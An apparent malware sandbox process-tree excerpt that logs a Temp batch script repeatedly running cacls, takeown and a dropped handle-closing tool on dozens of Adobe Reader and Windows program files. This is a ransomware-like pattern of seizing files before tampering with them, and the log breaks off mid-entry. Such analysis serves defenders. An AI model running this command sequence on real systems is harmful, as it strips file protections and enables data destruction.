- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""
  2⤵
  PID:1304
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"
    3⤵
    PID:1336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "ICELAND.TXT" -nobanner
    3⤵
    PID:2912
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "ICELAND.TXT" -nobanner
      4⤵
      PID:584
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""
  2⤵
  PID:216
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C
    3⤵
    PID:2928
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"
    3⤵
    PID:888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "CP1254.TXT" -nobanner
    3⤵
    PID:2064
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "CP1254.TXT" -nobanner
      4⤵
      PID:1100
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Windows Mail\de-DE\WinMail.exe.mui""
  2⤵
  PID:2108
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\de-DE\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2876
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\de-DE\WinMail.exe.mui"
    3⤵
    - Modifies file permissions
    PID:2124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:2092
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:2080
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Windows Mail\ja-JP\WinMail.exe.mui""
  2⤵
  PID:2176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\ja-JP\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3068
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\ja-JP\WinMail.exe.mui"
    3⤵
    - Modifies file permissions
    PID:2200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:2120
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:2116
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""
  2⤵
  PID:2280
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"
    3⤵
    PID:2916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:948
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:2236
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2320
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""
  2⤵
  PID:2300
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2188
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"
    3⤵
    PID:2228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:2372
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:2316
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2464
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\de-DE\jnwmon.dll.mui""
  2⤵
  PID:2392
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\jnwmon.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2428
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\jnwmon.dll.mui"
    3⤵
    PID:2540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "jnwmon.dll.mui" -nobanner
    3⤵
    PID:2344
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "jnwmon.dll.mui" -nobanner
      4⤵
      PID:2272
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2556
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui""
  2⤵
  PID:2552
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2404
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui"
    3⤵
    PID:2340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    PID:2484
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      PID:2576
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2656
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\fr-FR\jnwdui.dll.mui""
  2⤵
  PID:2596
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\fr-FR\jnwdui.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2440
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\fr-FR\jnwdui.dll.mui"
    3⤵
    PID:2488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "jnwdui.dll.mui" -nobanner
    3⤵
    PID:2648
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "jnwdui.dll.mui" -nobanner
      4⤵
      PID:2520
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2732
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\it-IT\MSPVWCTL.DLL.mui""
  2⤵
  PID:2760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:2568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\MSPVWCTL.DLL.mui"
    3⤵
    PID:2704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    PID:2528
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      PID:1940
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2680
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\Journal.exe""
  2⤵
  PID:788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Journal.exe" /E /G Admin:F /C
    3⤵
    PID:2676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Journal.exe"
    3⤵
    - Modifies file permissions
    PID:2692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "Journal.exe" -nobanner
    3⤵
    PID:660
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "Journal.exe" -nobanner
      4⤵
      PID:1496
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\Templates\Seyes.jtp""
  2⤵
  PID:2652
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Seyes.jtp" /E /G Admin:F /C
    3⤵
    PID:272
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Seyes.jtp"
    3⤵
    - Modifies file permissions
    PID:1168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "Seyes.jtp" -nobanner
    3⤵
    PID:1576
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "Seyes.jtp" -nobanner
      4⤵
      PID:952
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:556
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Mail\fr-FR\WinMail.exe.mui""
  2⤵
  PID:1732
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\fr-FR\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\fr-FR\WinMail.exe.mui"
    3⤵
    PID:1380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:2804
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:2828
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1812
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""
  2⤵
  PID:968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C
    3⤵
    PID:804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
    3⤵
    - Modifies file permissions
    PID:532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "AdobeID.pdf" -nobanner
    3⤵
    PID:2476
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "AdobeID.pdf" -nobanner
      4⤵
      PID:1580
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""
  2⤵
  PID:224
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2824
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:2004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2956
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:1336
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:584
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:2976
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:2160
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    PID:2880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:3052
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      PID:232
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:604
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""
  2⤵
  PID:212
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C
    3⤵
    PID:852
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"
    3⤵
    - Modifies file permissions
    PID:3016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "LogTransport2.exe" -nobanner
    3⤵
    PID:3048
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "LogTransport2.exe" -nobanner
      4⤵
      PID:2124
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2080
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""
  2⤵
  PID:2216
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C
    3⤵
    PID:2888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"
    3⤵
    PID:2136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "bl.gif" -nobanner
    3⤵
    PID:3068
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "bl.gif" -nobanner
      4⤵
      PID:1396
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1524
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""
  2⤵
  PID:2120
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C
    3⤵
    PID:3028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "forms_super.gif" -nobanner
    3⤵
    PID:2212
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "forms_super.gif" -nobanner
      4⤵
      PID:600
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2256
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""
  2⤵
  PID:2240
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C
    3⤵
    PID:308
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"
    3⤵
    PID:1552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "review_browser.gif" -nobanner
    3⤵
    PID:2280
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "review_browser.gif" -nobanner
      4⤵
      PID:2084
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1996
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""
  2⤵
  PID:2172
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C
    3⤵
    PID:2400
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"
    3⤵
    PID:2204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "tl.gif" -nobanner
    3⤵
    PID:2196
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "tl.gif" -nobanner
      4⤵
      PID:2164
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2428
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""
  2⤵
  PID:2360
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C
    3⤵
    PID:2572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"
    3⤵
    PID:2556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "AdobePiStd.otf" -nobanner
    3⤵
    PID:2468
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "AdobePiStd.otf" -nobanner
      4⤵
      PID:2268
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2356
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""
  2⤵
  PID:2340
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:2484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"
    3⤵
    PID:2632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
    3⤵
    PID:2496
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
      4⤵
      PID:2552
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2500
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""
  2⤵
  PID:2664
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C
    3⤵
    PID:2624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"
    3⤵
    - Modifies file permissions
    PID:2580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
    3⤵
    PID:2732
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
      4⤵
      PID:2640
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""
  2⤵
  PID:2728
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"
    3⤵
    PID:2748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "can.fca" -nobanner
    3⤵
    PID:2680
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "can.fca" -nobanner
      4⤵
      PID:2756
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2592
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""
  2⤵
  PID:392
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "usa03.ths" -nobanner
    3⤵
    PID:1044
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "usa03.ths" -nobanner
      4⤵
      PID:2684
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1964
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""
  2⤵
  PID:272
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C
    3⤵
    PID:996
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "GREEK.TXT" -nobanner
    3⤵
    PID:1508
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "GREEK.TXT" -nobanner
      4⤵
      PID:856
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
